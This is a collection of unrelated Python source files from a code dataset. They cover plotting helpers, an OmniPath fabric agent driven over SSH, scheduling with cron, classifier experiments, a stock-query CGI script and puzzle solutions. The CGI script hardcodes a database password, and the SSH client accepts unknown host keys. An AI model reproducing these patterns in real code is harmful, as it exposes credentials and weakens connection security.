\"PRELIMINARY\" on a plot.\n    \"\"\"\n    ax.text(0.5, 0.5, \"PRELIMINARY\", rotation=45, rotation_mode='anchor',\n            ha='center', va='center', zorder=1000,\n            fontdict=dict(fontsize=48, color='gray', alpha=0.2),\n            transform=ax.transAxes)\n    return\n\n\ndef make_jackknife_histogram(jack_results, N_bins=20, fig_name=None, col='b'):\n    bin_arr = np.zeros(N_bins)\n    bin_min = np.min(jack_results)\n    bin_max = np.max(jack_results)\n    bin_interval = (bin_max - bin_min) / float(N_bins)\n\n    for parm in jack_results:\n        for jj in range(N_bins):\n            if (parm - bin_min) < (jj + 1) * bin_interval:\n                bin_arr[jj] += 1\n                break\n\n    #bin_bounds = np.arange(N_bins) * bin_interval + bin_min\n    bin_bounds = np.arange(N_bins)\n    plt.bar(bin_bounds, bin_arr, color=col)\n    if fig_name is not None:\n        plt.savefig(fig_name)\n    plt.show()\n\n\ndef generate_table_from_plot(fig=None, xshift=0, x_header=r\"$t$\",\n                             y_headers=[], latex=False):\n    \"\"\"\n    Name: generate_table_from_plot\n    Purpose: Print a LaTeX table of the plotted data.\n    \"\"\"\n    #==========================================================================\n    # Extract data from the plot.\n    #==========================================================================\n    if fig is None:\n        lines = plt.gca().lines\n    else:\n        lines = []\n        for ax in fig.axes:\n            for obj in ax.lines:\n                lines.append(obj)\n    xs = []\n    ys = []\n    yerrs = []\n    num_plots = len(lines) // 4\n    for ii in range(num_plots):\n        plot_num = 4 * ii\n        xs.append(lines[plot_num].get_xdata())\n        y_1 = lines[plot_num].get_ydata()\n        y_2 = lines[plot_num + 2].get_ydata()\n        ys.append(y_2)\n        yerrs.append(np.abs(y_1 - y_2))\n        #y_headers.append(lines[plot_num].get_label())\n    master_x = []\n    for x_arr in xs:\n        for x in x_arr:\n            if x not in master_x:\n                master_x.append(x)\n    master_x.sort()\n\n    #==========================================================================\n    # Initialise variables for printing table.\n    #==========================================================================\n    new_line = \"\\\\tabularnewline\\n\"\n    line_break = \"\\n\"\n    hline = r\"\\hline\"\n    tab_start = r\"\\begin{tabular}\"\n    cols = \"{|c|\"\n    for ii in range(num_plots):\n        cols = cols + \"c|\"\n    cols = cols + \"}\"\n    tab_end = r\"\\end{tabular}\"\n    tab_lines = []\n    
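# tab_lines accumulates the LaTeX table source; raw_data mirrors the same values\n    # as plain whitespace-separated numbers (both lists are returned to the caller).\n    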
raw_data = []\n\n #==========================================================================\n # Table initialisation and headers.\n #==========================================================================\n if len(y_headers) != len(ys):\n y_headers = []\n for ii in range(len(ys)):\n y_headers.append(r\"$\\Gamma_%d$\" % ii)\n\n tab_lines.append(tab_start + cols)\n tab_lines.append(line_break)\n tab_lines.append(hline + line_break)\n tab_lines.append(\" %s \" % x_header)\n for y_header in y_headers:\n tab_lines.append(\"& %s \" % y_header)\n tab_lines.append(new_line)\n tab_lines.append(hline + line_break)\n\n #==========================================================================\n # Table body.\n #==========================================================================\n for x in master_x:\n tab_lines.append(\" %d \" % x)\n raw_data.append(\"%4d \" % int(x))\n for x_arr, y_arr, y_err in zip(xs, ys, yerrs):\n if x in x_arr:\n ind = np.where(x_arr == x)[0][0]\n y_str, e_str = fitting.format_value_error_string(y_arr[ind],\n y_err[ind])\n tab_lines.append(\"& %s(%s) \" % (y_str, e_str))\n raw_data.append(\"%10g %10g \" % (y_arr[ind], y_err[ind]))\n else:\n tab_lines.append(\"& - \")\n tab_lines.append(new_line)\n raw_data.append(\"\\n\")\n\n #==========================================================================\n # Table end.\n #==========================================================================\n tab_lines.append(hline + line_break)\n tab_lines.append(tab_end)\n tab_lines.append(line_break)\n tab_lines.append(line_break)\n\n return tab_lines, raw_data\n\n\ndef get_optimal_legend_loc(ax):\n \"\"\"\n Name: get_optimal_legend_loc\n Purpose: Given a single axis, or a list of axes sharing the same limits,\n work out which quadrant of the axis is the emptiest, and return\n this as the optimal location for a legend.\n \"\"\"\n #==========================================================================\n # Initialise variables.\n #==========================================================================\n quadrants = {\"upper right\": 0, \"upper left\": 0,\n \"lower right\": 0, \"lower left\": 0}\n\n if type(ax) == list:\n lines = []\n for axis in ax:\n for line in axis.lines:\n lines.append(line)\n ylim = axis.get_ylim()\n xlim = axis.get_xlim()\n else:\n lines = ax.lines\n ylim = ax.get_ylim()\n xlim = ax.get_xlim()\n\n #==========================================================================\n # For each point in the plot, determine if it is in the upper/lower, then\n # left/right quadrant. 
Increment the respective counter.\n    #==========================================================================\n    y_len = (ylim[1] - ylim[0]) / 2\n\n    for line in lines:\n        x_data = line.get_xdata()\n        y_data = line.get_ydata()\n        for x, y in zip(x_data, y_data):\n            up_diff = abs(ylim[1] - y)\n            down_diff = abs(ylim[0] - y)\n            if up_diff >= down_diff:\n                loc_v = \"lower\"\n                v_severity = np.exp(5 * (1 - (down_diff / y_len)))\n            else:\n                loc_v = \"upper\"\n                v_severity = np.exp(5 * (1 - (up_diff / y_len)))\n\n            left_diff = abs(xlim[0] - x)\n            right_diff = abs(xlim[1] - x)\n            loc_h = \"right\" if left_diff >= right_diff else \"left\"\n\n            quadrants[\"%s %s\" % (loc_v, loc_h)] += v_severity\n\n    #==========================================================================\n    # Return the quadrant which has the least points within that might be\n    # covered by the legend.\n    #==========================================================================\n    for quadrant, severity in quadrants.items():\n        if severity == min(quadrants.values()):\n            return quadrant\n\n\ndef suggest_legend_loc(axis):\n    \"\"\"\n    Name: suggest_legend_loc\n    Purpose: Read data from plot and decide whether to put legend in upper\n             right or lower right corner depending upon where there appears\n             to be the most space. Assumes that we are plotting a monotonically\n             decreasing/increasing function for optimal results.\n    \"\"\"\n    #==========================================================================\n    # Initialise variables - get data from plot.\n    #==========================================================================\n    lines = axis.lines\n    ylim = axis.get_ylim()\n    xlim = axis.get_xlim()\n\n    #==========================================================================\n    # Determine top/bottom: is the maximum y value closest to the upper\n    # boundary (loc=lower), or is the minimum y value closest to the lower\n    # boundary (loc=upper)?\n    #==========================================================================\n    y_max = None\n    y_min = None\n    for line in lines:\n        line_max = max(line.get_ydata())\n        line_min = min(line.get_ydata())\n        if y_max is None or y_max < line_max:\n            y_max = line_max\n        if y_min is None or y_min > line_min:\n            y_min = line_min\n\n    up_diff = abs(ylim[1] - y_max)\n    low_diff = abs(ylim[0] - y_min)\n    if up_diff >= low_diff:\n        loc_v = \"upper\"\n        y_comp = y_max\n    else:\n        loc_v = \"lower\"\n        y_comp = y_min\n\n    #==========================================================================\n    # Determine left/right: is the y value closest to the top/bottom boundary\n    # in the left half (loc=right) or right half (loc=left) of the plot?\n    #==========================================================================\n    for line in lines:\n        y_data = line.get_ydata()\n        if y_comp in y_data:\n            x_data = line.get_xdata()\n            x = x_data[np.where(np.array(y_data) == y_comp)]\n            left_diff = abs(xlim[0] - x)\n            right_diff = abs(xlim[1] - x)\n            if left_diff >= right_diff:\n                loc_h = \"left\"\n            else:\n                loc_h = \"right\"\n\n    loc = \"%s %s\" % (loc_v, loc_h)\n    return loc\n\n\n","sub_path":"Analysis/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":19443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203615930","text":"import paramiko\n\nfrom oslo_log import log as logging\n\nfrom neutron.plugins.ml2.drivers.omnipath import config\nfrom neutron.plugins.ml2.drivers.omnipath import omnipath_exceptions\n\nLOG = logging.getLogger(__name__)\nOPA_BINARY = \"opafmvf\"\n\n\n
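# Illustrative examples (vf/guid values are placeholders) of the shell commands the\n# wrapper below builds from OPA_BINARY and its arguments:\n#   opafmvf create <vf_name>\n#   opafmvf add <vf_name> <guid> [<guid> ...]\n#   opafmvf commit    (followed by \"opafmvf reload\" to apply the staged change)\n\n\n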
class FabricAgentCLI(object):\n    def __init__(self):\n        self._agent_hostname = None\n        self._agent_username = None\n        self._agent_key_path = None\n\n        self._read_config()\n\n        self.client = paramiko.SSHClient()\n        self.connect()\n\n    def _read_config(self):\n        self._agent_hostname = config.CONF.omnipath_config.IP_ADDRESS\n        LOG.debug(\"Fabric Agent IP address: %s\", self._agent_hostname)\n        self._agent_username = config.CONF.omnipath_config.USERNAME\n        self._agent_key_path = config.CONF.omnipath_config.KEY\n\n    def connect(self):\n        try:\n            key = paramiko.RSAKey.from_private_key_file(self._agent_key_path)\n            self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n            self.client.connect(\n                self._agent_hostname, port=22, username=self._agent_username, pkey=key)\n        except omnipath_exceptions.FabricAgentSSHError:\n            LOG.error(\"Error connecting to Omnipath FM\")\n\n    def execute_command(self, command):\n        # callers build the command as a list of tokens; join it, since\n        # paramiko's exec_command() expects a single string\n        if isinstance(command, list):\n            command = \" \".join(command)\n        stdin, stdout, stderr = self.client.exec_command(command)\n        err = stderr.read()\n        if err:\n            raise omnipath_exceptions.FabricAgentCLIError\n        return stdout.read()\n\n    def osfa_config_commands(self, command, vf_name, *args):\n        try:\n            if command == \"create\":\n                cmd = [OPA_BINARY, \"create\", vf_name]\n            elif command == \"delete\":\n                cmd = [OPA_BINARY, \"delete\", vf_name]\n            elif command == \"add\":\n                cmd = [OPA_BINARY, \"add\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n            elif command == \"remove\":\n                cmd = [OPA_BINARY, \"remove\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n            else:\n                raise omnipath_exceptions.FabricAgentUnknownCommandError\n            return self.execute_command(cmd)\n        except omnipath_exceptions.FabricAgentUnknownCommandError:\n            LOG.error(command + \" not supported in opafmvf CLI\")\n\n    def osfa_query_commands(self, command, vf_name, *args):\n        try:\n            if command == \"exist\":\n                cmd = [OPA_BINARY, \"exist\", vf_name]\n            elif command == \"ismember\":\n                cmd = [OPA_BINARY, \"ismember\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n            elif command == \"isnotmember\":\n                cmd = [OPA_BINARY, \"isnotmember\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n            else:\n                raise omnipath_exceptions.FabricAgentUnknownCommandError\n            return self.execute_command(cmd)\n        except omnipath_exceptions.FabricAgentUnknownCommandError:\n            LOG.error(command + \" not supported in opafmvf CLI\")\n\n    def osfa_management_commands(self, command):\n        try:\n            if command == \"reset\":\n                cmd = [OPA_BINARY, \"reset\"]\n            elif command == \"commit\":\n                cmd = [OPA_BINARY, \"commit\"]\n            elif command == \"reload\":\n                cmd = [OPA_BINARY, \"reload\"]\n            elif command == \"restart\":\n                cmd = [OPA_BINARY, \"restart\"]\n            else:\n                raise omnipath_exceptions.FabricAgentUnknownCommandError\n            return self.execute_command(cmd)\n        except omnipath_exceptions.FabricAgentUnknownCommandError:\n            LOG.error(command + \" not supported in opafmvf CLI\")\n\n\nclass FabricAgentClient(object):\n    def __init__(self):\n        self.cli = FabricAgentCLI()\n\n    # Neutron FabricAgentClient sending requests to Fabric Agent:\n    def full_sync(self, guids_info):\n        \"\"\"Will send list of GUIDs to be created/deleted to OpenStack Fabric Agent. 
The creates/deletes are implicit.\n\n :param guid_info: {vf_name1: [guid1, guid2], vf_name2: [guid3, guid4]}\n :return: bind status\n \"\"\"\n\n # lock\n # Add global lock so that this command is sent by only one neutron server\n for vf_name, guids in guids_info:\n config_status = self.cli.osfa_config_commands(\"add\", vf_name, guids)\n if config_status == 2:\n return \"ERROR\" # Port Status ERROR\n\n commit_status = self.cli.osfa_management_commands(\"commit\")\n if commit_status != 0:\n return \"ERROR\" # Port Status ERROR\n\n reload_status = self.cli.osfa_management_commands(\"reload\")\n if reload_status != 0:\n return \"ERROR\" # Port Status ERROR\n\n return \"DOWN\" # Port Status DOWN\n # unlock\n\n # Neutron retrieving status from Fabric Agent:\n\n def get_port_status(self, vf_name, guid):\n \"\"\"\n\n :param vf_name: Name of the VF\n :param guid: ID of the physical server\n :return: bind status\n \"\"\"\n\n query_status = self.cli.osfa_query_commands(\"ismember\", vf_name, [guid])\n if query_status == 0:\n return \"UP\"\n else:\n return \"DOWN\"\n","sub_path":"neutron/plugins/ml2/drivers/omnipath/mechanism_driver/fabric_agent.py","file_name":"fabric_agent.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400026438","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isSymmetrical(self, pRoot):\n if not pRoot:\n return True\n queue = [pRoot]\n right = pRoot\n while queue:\n p = queue.pop(0)\n if p.val != '#': # 如果当前不是空节点,则给空子树插入空节点\n if not p.left:\n p.left = TreeNode('#')\n if not p.right:\n p.right = TreeNode('#')\n queue.append(p.left)\n queue.append(p.right)\n if right == p:\n if not self.is_list_symmetrical(queue):\n return False\n if not queue:\n break\n right = queue[-1]\n return True\n\n def is_list_symmetrical(self, queue):\n if len(queue) % 2: # 长度为奇数\n return False\n left, right = len(queue) // 2 - 1, len(queue) // 2\n while left >= 0:\n if (not queue[left]) or (not queue[right]): # None\n if queue[left] == queue[right]:\n left -= 1\n right += 1\n continue\n else:\n return False\n if queue[left].val != queue[right].val:\n return False\n left -= 1\n right += 1\n return True\n\n","sub_path":"对称的二叉树/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591563935","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis, \\\n\tQuadraticDiscriminantAnalysis\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\n\ndata = pd.read_csv('datasets\\\\Auto.csv')\ndata = data.assign(weight_x_accel=data['weight'] * data['acceleration'])\n\ndata['mpg01'] = data['mpg'].apply(lambda x: 1 if x > np.median(data['mpg']) else 0)\n\nfig, ax = plt.subplots(1, 3)\nax[0].scatter(data['weight'], data['mpg01'])\nax[1].scatter(data['displacement'], data['mpg01'])\nax[2].scatter(data['acceleration'], data['mpg01'])\n\nax[0].set_title('weight')\nax[1].set_title('displacement')\nax[2].set_title('acceleration')\n\nX_train, X_test, y_train, y_test = train_test_split(\n\tdata[['acceleration', 'weight', 'displacement', 
'weight_x_accel']],\n\tdata['mpg01'], test_size=0.25)\n\naccuScore = pd.DataFrame(index=['logreg', 'lda', 'qda'], columns=['accuracyScore'])\n\n# All methods perform well (accuracy score>0.9)\nlda = LinearDiscriminantAnalysis().fit(X_train, y_train)\nconfusion_matrix(y_test, lda.predict(X_test))\naccuScore.loc['lda'] = accuracy_score(y_test, lda.predict(X_test))\n\nlogreg = LogisticRegression().fit(X_train, y_train)\nconfusion_matrix(y_test, logreg.predict(X_test))\naccuScore.loc['logreg'] = accuracy_score(y_test, logreg.predict(X_test))\n\nqda = QuadraticDiscriminantAnalysis().fit(X_train, y_train)\nconfusion_matrix(y_test, qda.predict(X_test))\naccuScore.loc['qda'] = accuracy_score(y_test, qda.predict(X_test))\n\naccuScore.plot(kind='bar')\n\n# Now let us see which k does best in knn model\nfrom sklearn.neighbors import KNeighborsClassifier\n\naccuScore_k = pd.Series(index=np.arange(1, 100), name='accuracy_score',\n\t\t\t\t\t\tdtype='float')\nfor ii in accuScore_k.index:\n\taccuScore_k[ii] = accuracy_score(y_test,\n\t\t\t\t\t\t\t\t\t KNeighborsClassifier(n_neighbors=ii).fit(\n\t\t\t\t\t\t\t\t\t\t X_train, y_train).predict(X_test))\n\n# The curve flattens out when the number of neighbors approaches the number of\n# test points.\nax = accuScore_k.plot()\nax.set_xlabel('n_neighbors')\nax.set_ylabel('accuracy_score')\n","sub_path":"Ch4_Ex11.py","file_name":"Ch4_Ex11.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"635056589","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n\n'''\nimport sys\nimport codecs\n#import cgitb\n#cgitb.enable()\n\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\n\n# Import modules for CGI handling \nimport logging\nimport cgi, cgitb \nimport json\nimport requests\nimport json \nimport numpy\nimport pandas as pd\n#import time\nimport utility\nimport traceback\nimport pymysql\n# Create instance of FieldStorage \nform = cgi.FieldStorage() \n\n# Get data from fields\nids = form.getvalue('ids')\n'''\nif ids is None:\n    print (\"Content-type:text/json\\n\")\n    print (\"Access-Control-Allow-Origin:*\")\n    print (\"ids is null. 沒有欲查詢的股票代碼\")\n'''\n#req_ids= ids.split(\",\")\nres_ids = list() # mis.twse.com.tw 有回覆的股票價格資訊\n#print \"Content-type:text/html\\n\"\n#print \"代碼!股票名稱a!22!33!44!55!66!77!88!99!000!111!222!333\"\n\n#targets = ['1101','1102','1103']\ntargets = ids.split(',')\n#stock_list = '|'.join('tse_{}.tw'.format(target) for target in targets) 上市\n#stock_list = '|'.join('otc_{}.tw'.format(target) for target in targets) 上櫃\nstock_list = '|'.join('{}.tw'.format(target) for target in targets)\n#print \"
    Hello %s %s
    \"% (stock_list, stock_list)\n'''\n\n'''\n# ts = datetime.datetime.now().timestamp()\n#current_milli_time = lambda: int(round(time.time() * 1000))\ntry:\n # 資料庫參數設定\n db_settings = {\n \"host\": \"192.168.1.13\",\n \"port\": 3306,\n \"user\": \"j20521007\",\n \"password\": \"j10551055\",\n \"db\": \"stock_sys\",\n \"charset\": \"utf8\"\n }\n # 建立Connection物件\n conn = pymysql.connect(**db_settings)\n # 建立Cursor物件\n with conn.cursor() as cursor:\n # 查詢資料SQL語法\n command = \"SELECT * FROM stock_group\"\n # 執行指令\n cursor.execute(command)\n # 取得所有資料\n result = cursor.fetchall()\n '''\n print(\"
    \")\n print(targets)\n print(\"
    \")\n print(res_ids)\n print(\"
    \")\n print(diff_ids)\n print(\"
    \")\n '''\n\n '''\n # json Test\n jsonData = {\"success\": \"true\"}\n '''\n #jsonData = json.dumps(resultData)\n resultData = []\n resultData.append({\"code\":\"999\", \"name\":\"--\", \"price\":0, \"pfp\":0})\n # result = {\"Success\":True,\"Msg\":\"\", \"timestamp\":utility.timestamp_milli(), \"Data\":resultData}\n jsonData = json.dumps(result)\n print (\"Content-type:application/json;charset=UTF-8\")\n print (\"Access-Control-Allow-Origin: *\")\n print (\"\") # 要 Access-Control-Allow-Origin: * 一定要這樣的輸出各式\n print (jsonData)\nexcept Exception as e:\n resultData = []\n resultData.append({\"code\":\"999\", \"name\":\"--\", \"price\":0, \"pfp\":0})\n error_class = e.__class__.__name__ #取得錯誤類型\n detail = e.args[0] #取得詳細內容\n cl, exc, tb = sys.exc_info() #取得Call Stack\n lastCallStack = traceback.extract_tb(tb)[-1] #取得Call Stack的最後一筆資料\n fileName = lastCallStack[0] #取得發生的檔案名稱\n lineNum = lastCallStack[1] #取得發生的行號\n funcName = lastCallStack[2] #取得發生的函數名稱\n errMsg = \"File \\\"{}\\\", line {}, in {}: [{}] {}\".format(fileName, lineNum, funcName, error_class, detail)\n # print(errMsg)\n\n result = {\"Success\":False,\"Msg\":\"An Error occurred:{}\".format(errMsg), \"timestamp\":utility.timestamp_milli()}\n jsonData = json.dumps(result)\n print (\"Content-type:application/json;charset=UTF-8\")\n print (\"Access-Control-Allow-Origin: *\")\n print (\"\") # 要 Access-Control-Allow-Origin: * 一定要這樣的輸出格式、順序\n print (jsonData)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"399104984","text":"\"\"\"\nSerializes and deserializes images \nafter converted to the DataFrame format\n\"\"\"\nimport cv2\nimport numpy as np\nimport json\n\n# Deserializes image from data frame dump\ndef deserialize_image(df_dump, width=72, height=48, depth=3, config='/home/ubuntu/settings.json'):\n # [1:-1] is used to remove '[' and ']' from dataframe string\n df_dump = np.fromstring(df_dump[1:-1], sep=', ', dtype='uint8')\n print(df_dump.shape)\n with open(config) as d:\n SETTINGS = json.load(d)\n width=SETTINGS['width']\n height=SETTINGS['height']\n depth=SETTINGS['depth']\n df_dump = np.resize(df_dump, (height, width, depth))\n\n return df_dump\n\n# Serializes image to data frame dump\ndef serialize_image(frame):\n return frame.tolist()\n","sub_path":"suiron/img_serializer.py","file_name":"img_serializer.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616940606","text":"import io\nimport os\nimport shutil\nimport stat\n\nimport six\nfrom crontab import CronTab\n\nfrom dagster import DagsterInstance, check, seven, utils\nfrom dagster.core.definitions import RepositoryDefinition\nfrom dagster.core.scheduler import DagsterSchedulerError, Scheduler\nfrom dagster.serdes import ConfigurableClass\n\n\nclass SystemCronScheduler(Scheduler, ConfigurableClass):\n '''Scheduler implementation that uses the local systems cron. 
Only works on unix systems that\n have cron.\n\n Enable this scheduler by adding it to your ``dagster.yaml`` in ``$DAGSTER_HOME``.\n '''\n\n def __init__( # pylint: disable=super-init-not-called\n self, inst_data=None,\n ):\n self._inst_data = inst_data\n self._cron_tab = CronTab(user=True)\n\n @property\n def inst_data(self):\n return self._inst_data\n\n @classmethod\n def config_type(cls):\n return {}\n\n @staticmethod\n def from_config_value(inst_data, config_value):\n return SystemCronScheduler(inst_data=inst_data)\n\n def debug_info(self):\n return \"Running Cron Jobs:\\n{jobs}\\n\".format(\n jobs=\"\\n\".join(\n [str(job) for job in self._cron_tab if 'dagster-schedule:' in job.comment]\n )\n )\n\n def start_schedule(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n schedule = self._get_schedule_by_name(instance, repository, schedule_name)\n\n # If the cron job already exists, remove it. This prevents duplicate entries.\n # Then, add a new cron job to the cron tab.\n if self.running_schedule_count(repository.name, schedule.name) > 0:\n self._end_cron_job(instance, repository, schedule)\n\n self._start_cron_job(instance, repository, schedule)\n\n # Verify that the cron job is running\n running_schedule_count = self.running_schedule_count(repository.name, schedule.name)\n if running_schedule_count == 0:\n raise DagsterSchedulerError(\n \"Attempted to write cron job for schedule \"\n \"{schedule_name}, but failed. \"\n \"The scheduler is not running {schedule_name}.\".format(schedule_name=schedule.name)\n )\n elif running_schedule_count > 1:\n raise DagsterSchedulerError(\n \"Attempted to write cron job for schedule \"\n \"{schedule_name}, but duplicate cron jobs were found. \"\n \"There are {running_schedule_count} jobs running for the schedule.\"\n \"To resolve, run `dagster schedule up`, or edit the cron tab to \"\n \"remove duplicate schedules\".format(\n schedule_name=schedule.name, running_schedule_count=running_schedule_count\n )\n )\n\n def stop_schedule(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n schedule = self._get_schedule_by_name(instance, repository, schedule_name)\n\n self._end_cron_job(instance, repository, schedule)\n\n # Verify that the cron job has been removed\n running_schedule_count = self.running_schedule_count(repository.name, schedule.name)\n if running_schedule_count > 0:\n raise DagsterSchedulerError(\n \"Attempted to remove existing cron job for schedule \"\n \"{schedule_name}, but failed. 
\"\n \"There are still {running_schedule_count} jobs running for the schedule.\".format(\n schedule_name=schedule.name, running_schedule_count=running_schedule_count\n )\n )\n\n def wipe(self, instance):\n # Note: This method deletes schedules from ALL repositories\n check.inst_param(instance, 'instance', DagsterInstance)\n\n # Delete all script files\n script_directory = os.path.join(instance.schedules_directory(), \"scripts\")\n if os.path.isdir(script_directory):\n shutil.rmtree(script_directory)\n\n # Delete all logs\n logs_directory = os.path.join(instance.schedules_directory(), \"logs\")\n if os.path.isdir(logs_directory):\n shutil.rmtree(logs_directory)\n\n # Remove all cron jobs\n for job in self._cron_tab:\n if 'dagster-schedule:' in job.comment:\n self._cron_tab.remove_all(comment=job.comment)\n\n self._cron_tab.write()\n\n def _get_bash_script_file_path(self, instance, repository, schedule):\n check.inst_param(instance, 'instance', DagsterInstance)\n\n script_directory = os.path.join(instance.schedules_directory(), \"scripts\")\n utils.mkdir_p(script_directory)\n\n script_file_name = \"{}.{}.sh\".format(repository.name, schedule.name)\n return os.path.join(script_directory, script_file_name)\n\n def _cron_tag_for_schedule(self, repository_name, schedule_name):\n return 'dagster-schedule: {repository_name}.{schedule_name}'.format(\n repository_name=repository_name, schedule_name=schedule_name\n )\n\n def _start_cron_job(self, instance, repository, schedule):\n script_file = self._write_bash_script_to_file(instance, repository, schedule)\n\n schedule_logs_directory = self.get_logs_directory(instance, repository, schedule.name)\n if not os.path.isdir(schedule_logs_directory):\n utils.mkdir_p(schedule_logs_directory)\n schedule_log_file_path = self.get_logs_path(instance, repository, schedule.name)\n\n command = \"{script_file} > {schedule_log_file_path} 2>&1\".format(\n script_file=script_file, schedule_log_file_path=schedule_log_file_path\n )\n\n job = self._cron_tab.new(\n command=command,\n comment='dagster-schedule: {repository_name}.{schedule_name}'.format(\n repository_name=repository.name, schedule_name=schedule.name\n ),\n )\n job.setall(schedule.cron_schedule)\n self._cron_tab.write()\n\n def _end_cron_job(self, instance, repository, schedule):\n self._cron_tab.remove_all(\n comment=self._cron_tag_for_schedule(repository.name, schedule.name)\n )\n self._cron_tab.write()\n\n script_file = self._get_bash_script_file_path(instance, repository, schedule)\n if os.path.isfile(script_file):\n os.remove(script_file)\n\n def running_schedule_count(self, repository_name, schedule_name):\n cron_tab = CronTab(user=True)\n matching_jobs = cron_tab.find_comment(\n self._cron_tag_for_schedule(repository_name, schedule_name)\n )\n\n return len(list(matching_jobs))\n\n def get_logs_directory(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n logs_directory = os.path.join(instance.schedules_directory(), \"logs\")\n schedule_logs_directory = os.path.join(logs_directory, repository.name, schedule_name)\n return schedule_logs_directory\n\n def get_logs_path(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n logs_directory = 
self.get_logs_directory(instance, repository, schedule_name)\n return os.path.join(logs_directory, \"scheduler.log\")\n\n def _write_bash_script_to_file(self, instance, repository, schedule):\n # Get path to store bash script\n script_file = self._get_bash_script_file_path(instance, repository, schedule)\n\n # Get path to store schedule attempt logs\n schedule_logs_directory = self.get_logs_directory(instance, repository, schedule.name)\n if not os.path.isdir(schedule_logs_directory):\n utils.mkdir_p(schedule_logs_directory)\n\n schedule_log_file_name = \"{}_{}.result\".format(\"${RUN_DATE}\", schedule.name)\n schedule_log_file_path = os.path.join(schedule_logs_directory, schedule_log_file_name)\n\n # Environment information needed for execution\n dagster_graphql_path = os.path.join(\n os.path.dirname(schedule.python_path), 'dagster-graphql'\n )\n dagster_home = os.getenv('DAGSTER_HOME')\n\n script_contents = '''\n #!/bin/bash\n export DAGSTER_HOME={dagster_home}\n export LANG=en_US.UTF-8\n {env_vars}\n\n export RUN_DATE=$(date \"+%Y%m%dT%H%M%S\")\n\n {dagster_graphql_path} -p startScheduledExecution -v '{variables}' -y \"{repo_path}\" --output \"{result_file}\"\n '''.format(\n dagster_graphql_path=dagster_graphql_path,\n repo_path=schedule.repository_path,\n variables=seven.json.dumps({\"scheduleName\": schedule.name}),\n result_file=schedule_log_file_path,\n dagster_home=dagster_home,\n env_vars=\"\\n\".join(\n [\n \"export {key}={value}\".format(key=key, value=value)\n for key, value in schedule.environment_vars.items()\n ]\n ),\n )\n\n with io.open(script_file, 'w', encoding='utf-8') as f:\n f.write(six.text_type(script_contents))\n\n st = os.stat(script_file)\n os.chmod(script_file, st.st_mode | stat.S_IEXEC)\n\n return script_file\n","sub_path":"python_modules/libraries/dagster-cron/dagster_cron/cron_scheduler.py","file_name":"cron_scheduler.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459829687","text":"'''\nCheck whether a 9 x 9 2d array representing a partially completed Sudoku is valid. Specifically,\ncheck that no row, column or 3 x 3 2D subarray contains duplicates. 
A 0-value in the 2D array\nindicates that entry is blank; every other entry is in [1, 9]\n'''\n\n'''\nTime-complexity: O(n^2), Space-complexity: O(n)\n'''\n\nimport math\nimport collections\n\n\n# Check if partially filled matrix has any conflicts\ndef is_valid_sudoku(partial_assignment):\n    # Return True if subarray\n    # partial_assignment[start_row:end_row][start_col:end_col] contains any\n    # duplicates in {1, 2, ..., len(partial_assignment)}; otherwise return\n    # False\n    def has_duplicate(block):\n        print('calling has_duplicate with block: ', block)\n        block = list(filter(lambda x: x != 0, block))\n        print('block after filter: ', block)\n        print('set(block): ', set(block))\n        return len(block) != len(set(block))\n\n    n = len(partial_assignment)\n    # Check row and column constraints.\n    if any(\n        has_duplicate([partial_assignment[i][j] for j in range(n)])\n        or has_duplicate([partial_assignment[j][i] for j in range(n)])\n        for i in range(n)):\n        return False\n    \n    # Check region constraints\n    region_size = int(math.sqrt(n))\n    return all(not has_duplicate([\n        partial_assignment[a][b]\n        for a in range(region_size * I, region_size * (I + 1))\n        for b in range(region_size * J, region_size * (J + 1))\n    ]) for I in range(region_size) for J in range(region_size))\n\n\n'''\nA cooler solution\n'''\n\n# Pythonic solution that exploits the power of list comprehension.\ndef is_valid_sudoku_pythonic(partial_assignment):\n    region_size = int(math.sqrt(len(partial_assignment)))\n    return max(\n        collections.Counter(k for i, row in enumerate(partial_assignment)\n                            for j, c in enumerate(row) if c != 0\n                            for k in ((i, 